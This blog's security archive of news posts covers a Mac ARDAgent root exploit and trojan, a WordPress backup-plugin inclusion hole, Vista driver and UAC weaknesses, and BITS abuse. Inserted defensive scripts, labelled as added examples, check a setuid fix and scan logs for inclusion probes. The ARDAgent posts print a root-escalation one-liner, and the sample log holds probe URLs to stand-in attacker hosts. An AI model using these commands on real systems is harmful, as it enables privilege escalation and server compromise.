Category Archives: Security

First Trojan Based on ARDAgent Root Exploit

Secure Mac are reporting that they have found a trojan designed to take advantage of the ARDAgent root exploit that I posted about previously.

The Trojan, dubbed “AppleScript.THT”, gives the remote attacker full access to the system, steals usernames and passwords, hides itself by turning off system logging, opens firewall ports, and can also be used to install key-logging software, take pictures with the built-in iSight camera and enable file sharing.

The Trojan comes either as a compiled AppleScript titled ASthtv05 or as a disk image called ASthtv_06. In both cases, the file has to be downloaded and executed by the user. At the moment, the Trojan does not take advantage of any other Mac vulnerabilities to automatically infect new machines – but that’s probably only a matter of time.

Secure Mac are advising Mac users to use MacScan to protect themselves against the threat. Or you could just stop the ARDAgent service from running scripts as root.

Temporary Fix for ARDAgent Root Privilege Escalation

If you’re worried about the security problem with Apple’s Remote Desktop Sharing that I posted about yesterday, but still want to use the service, then here’s a quick solution:

Open Terminal and type, all on one line, the following command:

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Now, if you run

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

you should get your own username back rather than root.

Mac OS X – Gain Root Privileges Through AppleScript

A serious security hole has been found in Mac OS X – both Leopard and Tiger are affected. The exploit allows someone with physical access to a Mac to run programs as the Root user.

The exploit uses the Apple Remote Desktop agent (ARDAgent) to execute a shell script, and because ARDAgent is installed setuid root the script runs as root. To test this, type the following command in Terminal:

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

This command works even if Remote Desktop Sharing is disabled and the Root user is disabled in the Directory Utility. However, it will only work if the user is logged into the computer. It will not work if Fast User Switching has been used.

As this is a brand new exploit there is no fix as of yet.
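The chmod u-s fix given in the post above works by removing the setuid bit that lets ARDAgent run scripts as root. The following shell script is an added example, not code from either of the ARDAgent posts: it reports whether a file still carries the setuid bit, defaulting to the ARDAgent path the fix post gives, so the mitigation can be verified (and re-verified after a system update, which may restore the bit). The function names and the temporary file used for the self-test are this example's own.

```shell
#!/bin/sh
# Added example (not from the original posts): verify that the setuid bit has
# been removed from ARDAgent, i.e. that the "chmod u-s" fix has been applied.
# The default path is the one given in the fix post; any other file can be
# passed instead, which is how the self-test below exercises the logic.

ARDAGENT="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

# is_setuid FILE -> exit 0 if the setuid bit is set on FILE, 1 otherwise
is_setuid() {
    [ -u "$1" ]
}

# check_ardagent [FILE] -> prints a one-line verdict for FILE (default: ARDAgent);
# returns 0 when the bit is clear (mitigated), 1 when it is still set, 2 if absent
check_ardagent() {
    f="${1:-$ARDAGENT}"
    if [ ! -e "$f" ]; then
        printf 'absent: %s\n' "$f"
        return 2
    fi
    if is_setuid "$f"; then
        printf 'setuid STILL SET (scripts run as root): %s\n' "$f"
        return 1
    fi
    printf 'setuid clear (mitigated): %s\n' "$f"
    return 0
}

# apply_fix FILE -> removes the setuid bit, the same chmod the post uses.
# On a system-owned file this needs root (hence sudo in the post); on a file
# you own it does not.
apply_fix() {
    chmod u-s "$1"
}

# Self-test on a constructed temporary file: set the bit, watch the verdict
# change once the fix is applied. Run as: sh this_script.sh --demo
demo() {
    t=$(mktemp)
    chmod u+s "$t"
    check_ardagent "$t"
    apply_fix "$t"
    check_ardagent "$t"
    rm -f "$t"
}

if [ "${1:-}" = "--demo" ]; then
    demo
fi
```

On a Mac, `check_ardagent` with no argument inspects the real agent; a non-zero return code is what you would wire into a periodic check, since a later OS update can put the setuid bit back.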

BackUpWordPress Plugin Security Issue

Over the last few days I’ve been noticing quite a few hits on my blog for various non-existent pages. Each of these hits takes the form of:

bkpwp_plugin_path=<URL of a text file on another website>

Checking the URL in the page request returns a text file containing PHP code that attempts to launch a remote shell.

The first part of the page request is a reference to a WordPress plugin called BackUpWordPress, which automatically backs up your WordPress database and files. According to SecurityFocus, the plugin does not properly check user-provided input, thereby potentially allowing remote users to access your hosting provider’s server.

At this point in time there is no update available to resolve this issue. If you’re using this plugin, then until a fix is made available, the safest option is to deactivate and remove the plugin.

Update: Since I wrote this piece, the BackUpWordPress plugin has been updated to fix this issue. Kudos to the developer for releasing a fix so quickly. More details in this comment.
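The probes described in this post leave a clear trace in the web server's access log: a request whose query string sets bkpwp_plugin_path to a URL on another host (the remote-file-inclusion pattern). The following shell script is an added example, not code from the post or from the plugin: it flags such lines, whether the URL is plain or percent-encoded, counts them, and extracts the URLs the probes pointed at so they can be reported or blocked. The log lines, IP addresses and hostnames are constructed for the example, and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original post: flag web-server log lines that
# carry the bkpwp_plugin_path parameter pointing at a remote URL, the probe the
# post describes. The sample log is constructed; its IPs are documentation
# addresses and its hostnames are .example names.

# Parameter followed by a URL scheme, either literal "://" or percent-encoded.
RFI_PATTERN='bkpwp_plugin_path=(https?|ftp)(://|%3a%2f%2f)'

# count_rfi_probes LOGFILE -> prints the number of matching lines (0 if none)
count_rfi_probes() {
    grep -Eic "$RFI_PATTERN" "$1" || true
}

# rfi_probe_urls LOGFILE -> prints the remote URL from each matching line, one
# per line, so the hosting the probes pull from can be reported or blocked
rfi_probe_urls() {
    grep -Ei "$RFI_PATTERN" "$1" | sed -E 's/.*bkpwp_plugin_path=([^& "]*).*/\1/'
}

# write_sample_log FILE -> writes four constructed Apache-style lines to FILE:
# two probes (one percent-encoded), one ordinary page view, and one search
# query that merely mentions the parameter name and must not be flagged.
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [10/Mar/2008:12:01:02 +0000] "GET /missing/page.php?bkpwp_plugin_path=http://attacker.example/shell.txt? HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Mar/2008:12:03:44 +0000] "GET /about/ HTTP/1.1" 200 8143 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2008:12:05:10 +0000] "GET /old/index.php?bkpwp_plugin_path=HTTP%3A%2F%2Fdrop.example%2Fcmd.txt HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
192.0.2.3 - - [10/Mar/2008:12:07:30 +0000] "GET /?s=bkpwp_plugin_path HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
EOF
}

# Demo on the constructed log. Run as: sh this_script.sh --demo
if [ "${1:-}" = "--demo" ]; then
    log=$(mktemp)
    write_sample_log "$log"
    printf 'probes found: %s\n' "$(count_rfi_probes "$log")"
    rfi_probe_urls "$log"
    rm -f "$log"
fi
```

Against a real log, `count_rfi_probes /var/log/apache2/access.log` (path assumed) tells you whether the scanner has visited; the 404 status on the sample probe lines is typical, since the scanners request pages that do not exist. Seeing the probes is only evidence of scanning, though; deactivating the plugin, as the post recommends, is what closes the hole.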

ATI Driver Flaw Exposes Vista Kernel to Attack

Security researchers have discovered a flaw with an ATI driver that allows unsigned and potentially dangerous code to be installed and loaded into the Vista kernel.

In order to increase security and to protect against attack, Microsoft have introduced a new driver signing requirement in Vista. By requiring that drivers are signed, Microsoft hoped that this would ensure that only drivers which were verified as being clean and compatible with Vista could be installed.

ATI duly had their drivers signed by VeriSign so that they could be installed on a Windows Vista system. Unfortunately, there was a flaw in one of the drivers. Apparently the flaw was originally a shortcut that allowed ATI developers to load modules into the driver for testing. When the driver was released, either no-one thought to remove the shortcut or ATI forgot about it.

In order to close the hole, ATI will have to patch the flaw in their driver, have it signed with a new certificate, roll out the update via Windows Update, and then have the original signing authority revoke the original certificate. It’s not a straightforward process and it’s by no means foolproof either.

Another Way to Subvert Windows

Symantec have released details of another possible way to subvert Windows, more specifically through the Background Intelligent Transfer Service (BITS).

BITS is used by Windows Update to download updates automatically in the background, and by Microsoft Messenger to transfer files. The fault lies in the fact that BITS bypasses any installed firewalls and does not require any suspicious actions to start a download. By using BITS, an attacker could automatically download whatever they wanted to your computer, including password or credit-card logging software and remote-access software; the possibilities are endless.

While there are no major infections using this method, it is just a matter of time before one does come along. Hopefully, Microsoft will have addressed the issue before that happens.

Program Names Matter on Windows Vista

One of the selling points of Windows Vista is its increased security. User Account Control (UAC) is designed to ensure that unknown programs aren’t launched without the user’s express permission. The idea is sound, but the actual implementation may be off.

The Register reports that the name of the program has a major bearing on whether or not UAC asks the user to authenticate the installation. If the program is named “install.exe” for example, then Vista will require that the program have admin rights and UAC will prompt the user to cancel or allow installation. However, if the program name does not contain any references to “install”, “update” or “uninstall” then Vista will happily let it run without user intervention, even though it is the exact same program.

Microsoft responded that Vista was designed to automatically detect install, update and uninstall programs. Because these types of programs generally need to write to protected areas of the registry and to system files, Vista prompts for admin rights to be assigned to the program.

While Vista may have been designed to detect these types of programs, it seems that all it is doing is checking the program name; otherwise, renaming the program would not allow it to run without UAC prompting the user. While this type of behaviour may offer a modicum of protection, it can be sidestepped by using an innocuous file name. The big question now is: how long will it take for malware authors to use this to bypass UAC and get their programs onto a Vista machine?

Problems with Realtek HD Audio Control Panel

I recently wrote about a vulnerability in the way that Windows handles animated cursors, and that Microsoft were releasing a patch for the problem. I downloaded and installed the patch yesterday, and discovered that it didn’t like my sound card all that much.

My HP desktop has a Realtek sound card, and the patch that MS released prevents the control panel for the sound card from loading, with the following error message:

The system DLL user32.dll was relocated in memory. The application will not run properly. The relocation occurred because the DLL C:\Windows\System32\Hhctrl.ocx occupied an address range reserved for Windows system DLLs. The vendor supplying the DLL should be contacted for a new DLL.

Fortunately, there is a fix available from Microsoft under KB 935448.